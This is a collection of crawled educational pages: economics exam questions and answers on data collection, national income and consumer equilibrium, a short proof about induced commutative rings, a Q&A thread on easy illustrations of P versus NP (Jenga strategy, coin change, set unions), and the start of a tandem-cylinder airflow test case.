The two methods of collecting of primary data are:
• Personal interview
• Telephone interview etc.,
Question 19.
Name the two important sources of secondary data?
The sources of secondary data are:
1. Published sources
2. Unpublished sources.
Question 20.
What is meant by universe?
In statistics, the universe or population refers to the aggregate of all items to be studied in an investigation.
Question 21.
What is meant by Sample?
Sample is only a part of the population or the universe.
Question 22.
What is meant by sample method?
The sample method is the method in which data are collected from a part of the population, i.e. a group of items taken from the universe, and conclusions are drawn on that basis.
1st PUC Economics Collection of Data Short Answer Type Questions
Question 1.
Name two types of data collection?
The two types of data collection:
1. Primary data
2. Secondary data.
Question 2.
Write any two methods of collecting primary data?
The two methods of collecting primary data are:
1. Personal interview method
2. Mailing questionaire method
3. Telephone interviews
Question 3.
Distinguish between census survey and sample survey?
1. Census Survey:
If data are collected for each and every unit of the universe or population, the method is called the census method or the method of complete enumeration.
2. Sample Survey:
Sample survey refers to the method in which data are collected about the samples or a group of items taken from the ‘universe.’
Question 4.
What are published sources of secondary data?
The published sources of secondary data include:
1. International publications.
2. Government Publications.
3. Reports of Commissions and Committees.
4. Semi-Government Publications.
5. Newspapers, Periodicals etc.,
Question 5.
Why sample surveys are preferred most?
1. When it becomes difficult to survey the whole universe, sample survey method is used.
2. Sample survey has more advantages because it provides reliable and accurate information at a lower cost and in a shorter time.
3. They require less energy.
4. Sample survey needs small team of enumerators.
Question 6.
Name the divisions of CSO?
The divisions of CSO:
1. Industrial Statistics Wing
2. Manpower Research Division
3. Population Division.
Question 7.
What do you mean by Spatial classification?
The classification of data on the basis of geographical location such as countries, states, cities, districts etc., is known as spatial classification.
ex: Production of food grains in different states, literacy level in different districts of Karnataka.
Question 8.
Frame at least four appropriate multiple-choice options for the following questions.
i) Which of the following is the most important when you buy a new dress?
1. Colour
2. Price
3. Brand
4. Quality of cloth
ii) How often do you use computers?
1. Every day
2. 6 times a week
3. 4 times a week
4. 2 times a week.
iii) Which of the following newspapers do you read regularly?
• a) The Times of India
• b) The Hindu
• c) Indian Express
• d) Any other.
iv) Is the rise in the price of petrol justified?
• Yes
• No
• Don’t Know
• None of the above.
v) What is the monthly income of your family?
• Less than Rs. 10,000
• Rs. 10,000 to Rs.20,000
• Rs.20,000 to Rs.30,000
• More than Rs.30,000
Question 9.
What are the types of variables? Explain?
There are two types of variables:
1. Continuous variables
2. Discrete variables
1. Continuous variables:
A continuous variable can assume any numerical value within a given range; it may take integral values (1, 2, 3, ...) as well as fractional values (e.g. 1.5, 2.37).
2. Discrete variables:
A discrete variable can take only certain values. It jumps from one value to another and values are not continuous.
For example, the number of students in a class: it can be 50, 65, 90 or 100, but not 50.5.
Question 10.
Give the formula to calculate class mid-point?
$$\text { Midpoints }=\frac{\text { upper limit }+\text { lower limit }}{2}$$
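A quick worked illustration of the formula (the class intervals below are made up, not from the text):

```python
# Class mid-point = (upper limit + lower limit) / 2 for each class interval.
def midpoint(lower, upper):
    return (upper + lower) / 2

intervals = [(0, 10), (10, 20), (20, 30)]   # illustrative class limits
midpoints = [midpoint(lo, hi) for lo, hi in intervals]
print(midpoints)  # → [5.0, 15.0, 25.0]
```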
Question 11.
What is the exclusive method of classification?
Under this method we form classes in such a way that the lower limit of a class coincides with the upper limit of the previous class, e.g. 0–10, 10–20, 20–30. The upper limit of each class is excluded from it, so an item equal to 10 is placed in the class 10–20.
Question 12.
What points should be kept in mind while preparing a questionnaire?
The points to keep in mind while preparing a questionnaire are:
1. The questionnaire should not be too long
2. The number of questions should be as minimum as possible.
3. The series of questions should move from general to specific.
4. The questions should not be complex.
5. The question should not indicate alternatives to the answer.
Question 13.
What are the three basic ways of collecting data?
There are three basic ways of collecting data:
1. Personal interviews:
This method is used when the researcher has access to all the members.
2. Mailing questionnaire:
When the data in a survey are collected by mail, the questionnaire is sent to each individual by mail with a request to complete and return it by a given date.
3. Telephone interviews:
In a telephone interview the investigator asks questions over telephone. The advantage of telephone interview are that they are cheaper than personal interview, and can be conducted in a shorter time.
Question 14.
Give the advantages and disadvantages of personal interviews, mailing questionnaires and telephone interviews.
Advantages:

a) Personal interview
1. Highest response rate
2. Allows use of all types of questions
b) Mailing questionnaire
1. Least expensive
2. Only method to reach remote areas
3. No influence on respondents
4. Maintains anonymity of respondent
5. Best for sensitive questions
c) Telephones
1. Relatively low cost
2. Relatively less influence on respondents
3. Relatively high response rate.
Disadvantages:

a) Personal interview
• Most expensive
• Possibility of influencing respondents
b) Mailing questionnaire
• Cannot be used by illiterates
• Long response time
• Does not allow explanation of ambiguous questions
• Reactions cannot be watched.
c) Telephones
• Limited use
• Reactions cannot be watched.
• Possibility of influencing respondents.
1st PUC Economics Collection of Data Long Answer Type Questions
Question 1.
What are the advantages and disadvantages of (1) personal interviews and (2) mailing questionnaires to respondents?
1. Personal interview:
1. The enumerator can personally explain to the respondent the objective of the enquiry and importance of study.
2. This will help in getting better co-operation of the respondent and in obtaining accurate answers to the questions in the questionnaire.
3. This will save time of the respondent and will keep him in good humour.
• This method is expensive.
• It needs a large team of enumerators, and money must be spent on their training and travel, besides other expenses on food, stationery, lodging, etc.
2. Mailing questionnaire to respondents:
1. The method of mailing questionnaire to respondents is far more convenient and less expensive.
• The respondents may not understand or misinterpret some questions.
• The respondent may not take enough care to answer all questions correctly.
• The respondent may ignore the questionnaire and not return it at all.
Question 2.
What are the main sources of errors in the collection of data?
Primary data are obtained by a study specifically designed to fulfil the data needs of the problems at hand.
Data which are not originally collected but rather obtain from published or unpublished sources are known as secondary data.
The difference between primary and secondary data is only of degree. Data which are primary in the name of one become secondary in the hands of another.
The main sources of error in the collection of data are as follows:
• Due to direct personal interview
• Due to indirect oral interview
• Information from correspondents may be misleading.
• Mailed questionnaire may not be properly answered.
• Schedules sent through enumerators may contain wrong information.
Question 3.
Explain the meaning of ‘statistical enquiry’?
The term 'enquiry' means a search for information or knowledge; a statistical enquiry is such a search conducted using statistical methods, for example collection and analysis of data. Whenever a statistical enquiry is conducted, it is necessary to collect numerical data.
Collecting numerical data is the first step in every statistical enquiry. The investigator who collects the data should consider the following before proceeding to collect them:
1. purpose of enquiry
2. sources of data
3. methods of data collection
4. nature and type of enquiry
5. unit of collection
Question 4.
What precautions are needed before using the secondary data?
1. The investigator must ensure that the data are suitable for the purpose of the enquiry.
2. The investigator should also see what type of data is adequate for the investigation.
3. The investigator must ensure that the data are reliable enough to be used. Reliability can be judged from:
• The status of the agency which collected the data.
• The method used for collecting the data.
Question 5.
What is direct personal investigation? What are its merits and demerits?
Direct personal investigation:
Under this method, the investigator establishes personal contact with those from whom the information is to be obtained.
Merits:
• Since the investigator personally collects the information, the data are original and accurate.
• The questions can be explained to the informant according to his educational standard.
• Data obtained through this method are uniform and homogenous.
Demerits:
• This method suffers from personal elements and hence conclusions and inferences are likely to be biased.
• This method of collecting data is very complex.
• This method involves unnecessary wastage of time and money.
Question 6.
Explain the mail questionnaire method of data collection?
Some surveys can be conducted through the use of mail questionnaire. Under this method, a list of questions pertaining to the enquiry is prepared and sent to various informants by post.
The questionnaire contains questions, and provide space for answers. A request is made to the informants through a covering letter to fill up questionnaire and send it back within a specified time.
Merits:
1. The merit of this method is that it does not allow the influencing of the respondent by the interviewer.
2. Mailing costs are much lower than the costs of personal visits.
3. It allows the respondents to remain anonymous.
4. It can reach all groups, including those with whom personal contact is not possible.
Demerits:
1. This method can be adopted only where the informants are literate.
2. It involves some uncertainty about the response.
3. The information supplied by the informants may not be correct.
Question 7.
Distinguish between sampling and non-sampling methods. | 2023-02-04 08:09:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2656671106815338, "perplexity": 3282.094761092524}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500095.4/warc/CC-MAIN-20230204075436-20230204105436-00574.warc.gz"} |
# Economics Delhi Set 1 2014-2015 CBSE (Commerce) Class 12 Question Paper Solution
Economics [Delhi Set 1]
Date: March 2015
[1] 1
Give the equation of Budget Line.
Concept: Types of Budget
Chapter: [0.05] Government Budget and the Economy
[1] 2
When the income of the consumer falls the impact on a price-demand curve of an inferior good is: (choose the correct alternative)
a. Shifts to the right.
b. Shifts of the left.
c. There is upward movement along the curve.
d. There is downward movement along the curve
Concept: Demand
Chapter: [0.02] Consumer Equilibrium and Demand
[1] 3
If Marginal Rate of Substitution is constant throughout, the Indifference curve will be :(choose the correct alternative)
a. Parallel to the x-axis.
b. Downward sloping concave.
c. Downward sloping convex.
d. Downward sloping straight line.
Concept: Indifference Curve
Chapter: [0.02] Consumer Equilibrium and Demand
[3] 4
Giving reason comment on the shape of Production Possibilities curve based on the following schedule :
| Good X (units) | Good Y (units) |
|---|---|
| 0 | 10 |
| 1 | 9 |
| 2 | 7 |
| 3 | 4 |
| 4 | 0 |
Concept: Concept of Production
Chapter: [0.03] Producer Behaviour and Supply
[3] 5
[3] 5.1
What will be the impact of recently launched 'Clean India Mission' (Swachh Bharat Mission) on the Production Possibilities curve of the economy and why?
Concept: Concept of Production
Chapter: [0.03] Producer Behaviour and Supply
[3] 5.2
What will likely be the impact of large-scale outflow of foreign capital on Production Possibilities curve of the economy and why?
Concept: Concept of Production
Chapter: [0.03] Producer Behaviour and Supply
[3] 6
The measure of price elasticity of demand of a normal good carries minus sign while price elasticity of supply carries plus sign. Explain why?
Concept: Elasticity of Demand
Chapter: [0.02] Consumer Equilibrium and Demand
[3] 7
Explain ‘large number of buyers and sellers' features of a perfectly competitive market.
Concept: Features of Perfect Competition
Chapter: [0.04] Forms of Market and Price Determination
[3] 8
What is maximum price ceiling? Explain its implications.
Concept: Price Ceiling
Chapter: [0.04] Forms of Market and Price Determination
[4] 9
A consumer spends Rs 1000 on a good priced at Rs 8 per unit. When price rises by 25 percent, the consumer continues to spend Rs 1000 on the good. Calculate the price elasticity of demand by percentage method.
Concept: Elasticity of Demand
Chapter: [0.02] Consumer Equilibrium and Demand
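The percentage-method calculation for this question can be sketched directly from the figures given (the variable names are illustrative):

```python
# Consumer spends Rs 1000 at Rs 8 per unit; price rises by 25% and
# expenditure stays at Rs 1000, so quantity falls from 125 to 100 units.
expenditure = 1000.0
p1 = 8.0
p2 = p1 * 1.25                       # Rs 10 after the 25% rise
q1 = expenditure / p1                # 125.0 units
q2 = expenditure / p2                # 100.0 units
pct_change_q = (q2 - q1) / q1 * 100  # -20%
pct_change_p = (p2 - p1) / p1 * 100  # +25%
elasticity = pct_change_q / pct_change_p
print(round(elasticity, 2))          # → -0.8
```

The minus sign reflects the inverse price-quantity relation; in magnitude the elasticity is 0.8.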
[4] 10 | Attempt Any One
[4] 10.1
Define cost.
Concept: Cost - Fixed Cost
Chapter: [0.03] Producer Behaviour and Supply
State the relation between marginal cost and average variable cost.
Concept: Cost - Average Variable Cost
Chapter: [0.03] Producer Behaviour and Supply
[4] 10.2
Define revenue
Concept: Measures of Government Deficit Or Surpluses
Chapter: [0.05] Government Budget and the Economy
State the relation between marginal revenue and average revenue.
Concept: Measures of Government Deficit Or Surpluses
Chapter: [0.05] Government Budget and the Economy
[6] 11 | Attempt Any One
[6] 11.1
A consumer consumes only two goods X and Y both priced at Rs 3 per unit. If the consumer chooses a combination of these two goods with Marginal Rate of Substitution equal to 3, is the consumer in equilibrium? Give reasons. What will a rational consumer do in this situation? Explain
Concept: Consumer's Equilibrium
Chapter: [0.02] Consumer Equilibrium and Demand
[6] 11.2
A consumer consumes only two goods X and Y whose prices are Rs 4 and Rs 5 per unit respectively. If the consumer chooses a combination of the two goods with marginal utility of X equal to 5 and that of Y equal to 4, is the consumer in equilibrium? Give reason. What will a rational consumer do in this situation? Use utility analysis.
Concept: Consumer's Equilibrium
Chapter: [0.02] Consumer Equilibrium and Demand
[6] 12
State the behaviour of marginal product in the law of variable proportions. Explain the causes of this behaviour
Concept: Law of Variable Proportions
Chapter: [0.03] Producer Behaviour and Supply
[6] 13
Why is the equality between marginal cost and marginal revenue necessary for a firm to be in equilibrium? Is it sufficient to ensure equilibrium? Explain.
Concept: Concept of Producer's Equilibrium
Chapter: [0.03] Producer Behaviour and Supply
[6] 14
A market for a good is in equilibrium. The demand for the good 'increases'. Explain the chain of effects of this change.
Concept: Market Equilibrium
Chapter: [0.04] Forms of Market and Price Determination
[1] 15
Define aggregate supply?
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
[1] 16
The value of the multiplier is: (choose the correct alternative)
a. 1/MPC
b. 1/MPS
c. 1/(1 − MPS)
d. 1/(MPC − 1)
Concept: Investment Multiplier and Its Mechanism
Chapter: [0.04] Determination of Income and Employment
[1] 17
Borrowing in government budget is ______.
Revenue deficit
Fiscal deficit
Primary deficit
Deficit in taxes
Concept: Meaning of Government Budget
Chapter: [0.05] Government Budget and the Economy
[1] 18
The non-tax revenue in the following is: (choose the correct alternative)
a. Export duty
b. Import duty
c. Dividends
d. Excise
Concept: Direct and Indirect Tax
Chapter: [0.05] Government Budget and the Economy
[1] 19
Other things remaining unchanged, when in a country the price of foreign currency rises, national income is: (choose the correct alternative)
a. Likely to rise
b. Likely to fall
c. Likely to rise and fall both
d. Not affected
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
[3] 20
If Real GDP is Rs 200 and Price Index (with base = 100) is 110, calculate Nominal GDP
Concept: Gross and Net Domestic Product (GDP and NDP)
Chapter: [0.02] National Income and Related Aggregates
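The conversion is one line — Nominal GDP = Real GDP × (price index / 100); a quick sketch with the question's figures:

```python
# Nominal GDP from Real GDP and the price index (base year = 100).
real_gdp = 200
price_index = 110
nominal_gdp = real_gdp * price_index / 100
print(nominal_gdp)  # → 220.0
```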
[3] 21 | Attempt Any One
[3] 21.1
Name the broad categories of transactions recorded in the 'capital account' of the Balance of Payments Account
Concept: Concept of Balance of Payments Account
Chapter: [0.06] Balance of Payments
[3] 21.2
Name the broad categories of transactions recorded in the 'current account' of the Balance of Payments Accounts
Concept: Concept of Balance of Payments Account
Chapter: [0.06] Balance of Payments
[3] 22
Where will the sale of machinery to abroad be recorded in the Balance of Payments Accounts? Give reasons.
Concept: Concept of Balance of Payments Account
Chapter: [0.06] Balance of Payments
[4] 23 | Attempt Any One
[4] 23.1
Explain the ‘bank of issue’ function of central bank.
Concept: Function of Central Bank - Bank of Issue
Chapter: [0.03] Money and Banking
[4] 23.2
Explain "Banker to the Government" function of the Central Bank.
Concept: Central Bank Function - Goverment Bank
Chapter: [0.03] Money and Banking
[4] 24
A government of India has recently launched 'Jan-Dhan Yojana' aimed at every household in the country to have at least one bank account. Explain how deposits made under the plan are going to affect the national income of the country.
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
[4] 25
An economy is in equilibrium. Calculate national income from the following :
Autonomous consumption = 100
Marginal propensity to save = 0.2
Investment expenditure = 200
Concept: Consumption Function and Propensity to Save
Chapter: [0.04] Determination of Income and Employment
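A sketch of the equilibrium-income calculation, using the standard identity Y = C + I with C = autonomous consumption + MPC·Y and MPC = 1 − MPS (exact fractions avoid floating-point noise):

```python
from fractions import Fraction

# All figures from the question, in Rs (units as given).
autonomous_c = Fraction(100)
investment = Fraction(200)
mps = Fraction(1, 5)   # marginal propensity to save = 0.2
mpc = 1 - mps          # marginal propensity to consume = 0.8

# Equilibrium: Y = autonomous_c + mpc*Y + investment
# => Y * (1 - mpc) = autonomous_c + investment, and (1 - mpc) = mps.
y = (autonomous_c + investment) / mps
print(y)  # → 1500
```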
[6] 26
Giving reason explain how should the following be treated in the estimation of national income:
Expenditure by a firm on payment of fees to a chartered accountant
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
Giving reason explain how should the following be treated in the estimation of national income:
Payment of corporate tax by a firm
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
Giving reason explain how should the following be treated in the estimation of national income:
Purchase of refrigerator by a firm for own use
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
[6] 27
[6] 27.1
What is meant by inflationary gap?
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
Explain the role of Repo Rate in reducing the Inflationary gap.
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
[6] 27.2
Explain the concept of Deflationary Gap
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
Explain the role of 'Open Market Operations' in reducing Deflationary Gap
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
[6] 28
Explain the role of government budget in influencing the allocation of resources.
Concept: Government Budget - Allocation of Resources
Chapter: [0.05] Government Budget and the Economy
[6] 29
Calculate National Income and Personal Disposable Income:
| S. No. | Item | (Rs crores) |
|---|---|---|
| 1 | Personal tax | 80 |
| 2 | Private final consumption expenditure | 600 |
| 3 | Undistributed profits | 30 |
| 4 | Private income | 650 |
| 5 | Government final consumption expenditure | 100 |
| 6 | Corporate tax | 50 |
| 7 | Net domestic fixed capital formation | 70 |
| 8 | Net indirect tax | 60 |
| 9 | Depreciation | 14 |
| 10 | Change in stocks | (−)10 |
| 11 | Net imports | 20 |
| 12 | Net factor income to abroad | 10 |
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
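One standard solution path for this question — the expenditure method for national income and income-side identities for personal disposable income (the method choice is an assumption; the figures are from the table):

```python
# Figures in Rs crores, taken from the question.
pfce = 600                 # private final consumption expenditure
gfce = 100                 # government final consumption expenditure
ndfcf = 70                 # net domestic fixed capital formation
change_in_stocks = -10
net_imports = 20
net_indirect_tax = 60
nfi_to_abroad = 10         # net factor income to abroad
private_income = 650
undistributed_profits = 30
corporate_tax = 50
personal_tax = 80

# Expenditure method: NDP at market prices
ndp_mp = pfce + gfce + ndfcf + change_in_stocks - net_imports        # 740
# National income = NNP at factor cost
national_income = ndp_mp - net_indirect_tax - nfi_to_abroad          # 670
# Personal disposable income
pdi = private_income - undistributed_profits - corporate_tax - personal_tax  # 490
print(national_income, pdi)  # → 670 490
```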
Structure Induced by Commutative Ring Operations is Commutative Ring
Theorem
Let $\struct {R, +, \circ}$ be a commutative ring.
Let $S$ be a set.
Let $\struct {R^S, +', \circ'}$ be the structure on $R^S$ induced by $+$ and $\circ$.
Then $\struct {R^S, +', \circ'}$ is a commutative ring.
Proof
By Structure Induced by Ring Operations is Ring, $\struct {R^S, +', \circ'}$ is a ring.
From Structure Induced by Commutative Operation is Commutative, the pointwise operation $\circ'$ that $\circ$ induces on $R^S$ is also commutative.
The result follows by definition of commutative ring.
$\blacksquare$ | 2020-08-10 06:04:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9493433237075806, "perplexity": 148.4463015681271}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738609.73/warc/CC-MAIN-20200810042140-20200810072140-00162.warc.gz"} |
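As an informal illustration (not part of the proof), the induced pointwise operations can be spot-checked on a small concrete instance: take $R$ to be the integers and $S$ a three-element set, with elements of $R^S$ represented as Python dicts.

```python
# Pointwise (induced) operations on R^S, with R = the integers and
# S = {"a", "b", "c"}. A finite sanity check, not a proof.
S = {"a", "b", "c"}

def pointwise(op, f, g):
    """The operation on R^S induced pointwise by op on R."""
    return {s: op(f[s], g[s]) for s in S}

add = lambda x, y: x + y
mul = lambda x, y: x * y

f = {"a": 2, "b": -1, "c": 7}
g = {"a": 5, "b": 3, "c": 0}

# Commutativity of + and ∘ on R carries over to the induced +' and ∘'.
assert pointwise(add, f, g) == pointwise(add, g, f)
assert pointwise(mul, f, g) == pointwise(mul, g, f)
print(pointwise(mul, f, g)["a"])  # → 10
```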
# P vs NP: Instructive example of when Brute Force search can be avoided
To be able to explain the P vs NP problem to non-mathematicians I would like to have a pedagogical example of when brute-force search can be avoided. The problem should ideally be immediately understandable and the trick should be neither too easy nor too hard.
The best I've come up with so far is
SUBSET_PRODUCT_IS_ZERO
The problem is easy to understand (given a set of integers, can a subset with product 0 be formed?), but the trick is too easy (check if 0 is among the given numbers, i.e. it's not necessary to look at a lot of subsets).
Any suggestions?
• Do you want a better-than-bruteforce algorithm for an NP-complete problem or for a silly problem, like subset-product-is-0? How about the trick that does $2^{n/2 + o(n)}$ for subset sum, see e.g. the horowitz and sahni algorithm here rjlipton.wordpress.com/2010/02/05/… – Sasho Nikolov Mar 8 '13 at 19:43
• Perhaps I didn't understand well the question, but if you need an easy understandable problem in P with an "intermediate level" polynomial time algorithm, then I suggest the classical 2-CNF satisfiability. – Marzio De Biasi Mar 8 '13 at 19:46
• How about 2-Coloring vs 3-Coloring? – Serge Gaspers Mar 9 '13 at 0:29
• THe way this question is written seems to presuppose that NP-complete problems can only be solved by brute force search. That would be a mistake. For instance the naive brute force search for the traveling salesman problem takes $O(n!)$ time whereas it can be solved by a non-brute-force dynamic programming algorithm in the much faster time bound $O(n^2 2^n)$. – David Eppstein Mar 9 '13 at 17:03
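The meet-in-the-middle idea mentioned in the comments (the $2^{n/2+o(n)}$ subset-sum trick) can be sketched as a decision procedure — this is an illustrative version, not the exact Horowitz–Sahni bookkeeping:

```python
from bisect import bisect_left
from itertools import combinations

def subset_sum_mitm(nums, target):
    """Decide subset sum in roughly O(2^(n/2)) time: enumerate all subset
    sums of each half, sort one side, and for every sum s of the other
    side binary-search for target - s."""
    half = len(nums) // 2
    left, right = nums[:half], nums[half:]

    def all_sums(items):
        return [sum(c) for r in range(len(items) + 1)
                for c in combinations(items, r)]

    right_sums = sorted(all_sums(right))
    for s in all_sums(left):
        need = target - s
        i = bisect_left(right_sums, need)
        if i < len(right_sums) and right_sums[i] == need:
            return True
    return False

print(subset_sum_mitm([3, 34, 4, 12, 5, 2], 9))   # → True  (4 + 5)
print(subset_sum_mitm([3, 34, 4, 12, 5, 2], 30))  # → False
```

This is still exponential, but exponentially faster than trying all $2^n$ subsets — a useful contrast with the truly polynomial examples below.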
I recommend Jenga!
Assuming you have two perfectly logical, sober, and dextrous players, Jenga is a perfect-information two-player game, just like Checkers or Go. Suppose the game starts with a stack of $3N$ bricks, with 3 bricks in each level. For most of the game, each player has $\Theta(N)$ choices at each turn for the next move, and in the absence of stupid mistakes, the number of turns is always between $N$ and $6N$. So crudely, the game tree has $N^{\Theta(N)}$ states. If you explored the game tree by brute force, you might spend exponential time to find a winning move or convince yourself that you can't win.
But in fact, Uri Zwick proved in 2005 that you can play Jenga perfectly by keeping track of just three integers, using a simple set of rules that you can easily fit on a business card. The three numbers you need are
• $m =$ the number of levels (not counting the top level) with three bricks.
• $n =$ the number of levels (not counting the top level) with two bricks side by side.
• $t =$ the number of bricks in the top level (0, 1, 2, or 3).
In fact, most of the time, you only have to remember $n\bmod 3$ and $m\bmod 3$ instead of $n$ and $m$. Here is the complete winning strategy:
In the strategy chart (an image in the original answer, not reproduced here), I-I means you should move the middle brick from any 3-layer to the top, II- means you should move a side brick from a 3-layer to the top, -I- means you should move a side brick from a 2-layer to the top, and the bob-omb means you should think about death and get sad and stuff. If there's more than one suggested move in a box, you can choose any one of them. It's trivial to execute this strategy in $O(1)$ time if you already know the triple $(m,n,t)$, or in $O(N)$ time if you don't.
Moral: Jenga is only fun if everyone is clumsy and/or drunk.
• That's an excellent teaching example, but I would've given the +1 for the Pilgrim reference alone. – Luke Mathieson Mar 9 '13 at 0:24
A cashier has to return $x$ cents of change to a customer. Given the coins she has available, can she do it and how?
• Brute force: consider all possible collections of coins and see if one of them adds up to $x$.
• Non-brute force: do it as every cashier does, by dynamic programming.
There are two variants of the problem:
1. Easy: the cashier has unlimited supply of all denominations.
2. Harder: the cashier has a limited supply of coins.
The easy variant can be solved with a greedy algorithm. The harder one requires dynamic programming.
Actually, the way to present this is to propose the brute force solution, get people to understand that it is very inefficient, and then ask them what cashiers do, first for the easy variant, then in the hard one. You should have some examples available that go from easy to nasty.
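The harder variant (limited coins) is a bounded subset-sum, and the dynamic program can be sketched in a few lines — the denominations below are illustrative, not part of the answer:

```python
def make_change(coins, x):
    """Return a sub-multiset of `coins` (list of coin values) summing to x,
    or None. DP over reachable amounts: O(len(coins) * x) time, versus
    the 2^len(coins) collections of the brute-force approach."""
    parent = {0: None}                 # amount -> (previous amount, coin used)
    for coin in coins:
        # Iterate over a snapshot so each physical coin is used at most once.
        for amount in list(parent):
            nxt = amount + coin
            if nxt <= x and nxt not in parent:
                parent[nxt] = (amount, coin)
    if x not in parent:
        return None
    used, a = [], x
    while parent[a] is not None:       # walk back through the DP table
        prev, coin = parent[a]
        used.append(coin)
        a = prev
    return used

print(sorted(make_change([25, 10, 10, 5, 1, 1], 21) or []))  # → [1, 10, 10]
```

For the easy variant (unlimited supply of canonical denominations), the greedy "largest coin first" rule suffices, which is what cashiers actually do.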
I think I found a useful example myself!
Perhaps I was a little vague, but I was looking for a problem that met the following specifications:
• The problem itself should be easy to explain to someone studying social sciences.
• It should have an obvious but ineffective algorithm.
• It should have a better algorithm that is also easy to explain to someone studying social sciences.
For Eulerian Cycle it's easy to explain that it's a necessary condition that every node must have even degree, but it isn't as easy to explain why it's a sufficient condition.
This is the problem that I think so far best meets the specification above:
FORM_TARGET_SET_WITH_UNIONS
Collection $C=\{S_1, S_2,...,S_n\}$ of sets
Target set $T$
Question: Is it possible to form target set $T$ by taking the union of some of the sets in $C$ ?
Obvious but ineffective algorithm:
• Form all $2^n$ possible unions
• See if one of them corresponds to $T$
Better algorithm
• Mark the sets in $C$ that are contained in $T$
• Form the union $S_{_\cup}$ of these sets
• If $|S_{_\cup}|=|T|$ answer $YES$, otherwise answer $NO$
There is also the sister problem
FORM_TARGET_SET_WITH_INTERSECTIONS
for which the better algorithm is
• Mark the sets in $C$ that contain $T$
• Form the intersection $S_{_\cap}$ of these sets
• If $|S_{_\cap}|=|T|$ answer $YES$, otherwise answer $NO$
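Both of the better algorithms above fit in a few lines (the Python set encodings are illustrative):

```python
def can_form_by_unions(C, T):
    """YES iff T is the union of some of the sets in C.
    Union every set contained in T and compare with T: polynomial time,
    versus checking all 2^n unions."""
    u = set()
    for s in C:
        if s <= T:          # s is contained in T
            u |= s
    return u == T

def can_form_by_intersections(C, T):
    """YES iff T is the intersection of some of the sets in C.
    Intersect every set that contains T and compare with T."""
    supersets = [s for s in C if s >= T]
    if not supersets:
        return False
    return set.intersection(*supersets) == T

C = [{1, 2}, {2, 3}, {5}]
print(can_form_by_unions(C, {1, 2, 3}))  # → True  ({1,2} ∪ {2,3})
print(can_form_by_unions(C, {1, 3}))     # → False
```

Since the candidate union (resp. intersection) always lies inside (resp. contains) $T$, comparing sizes as in the algorithms above is equivalent to comparing the sets directly, as done here.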
As you can see I was looking for something really simple (almost as simple as SUBSET_PRODUCT_IS_ZERO).
The problem can also be contrasted with SUBSET SUM and SUBSET PRODUCT, which are NP-complete but similar in their formulation. In all these problems one is presented with a collection of objects and asked if an operation on a selection of these objects can produce a desired result. | 2019-12-13 00:45:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.585793137550354, "perplexity": 449.2993021859589}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540547536.49/warc/CC-MAIN-20191212232450-20191213020450-00258.warc.gz"} |
# Test Case Study
## Brief Description of the Study Test Case
A detailed description of the chosen test case (TC with L = 3.7D) is available here. So in the following we present only its brief overview.
A schematic of the airflow past the TC configuration is shown in Figure 1. The model is comprised of two cylinders of equal diameter aligned with the streamwise flow direction. The polar angle, ${\displaystyle {\theta }}$, is measured from the upstream stagnation point and is positive in the clockwise direction.
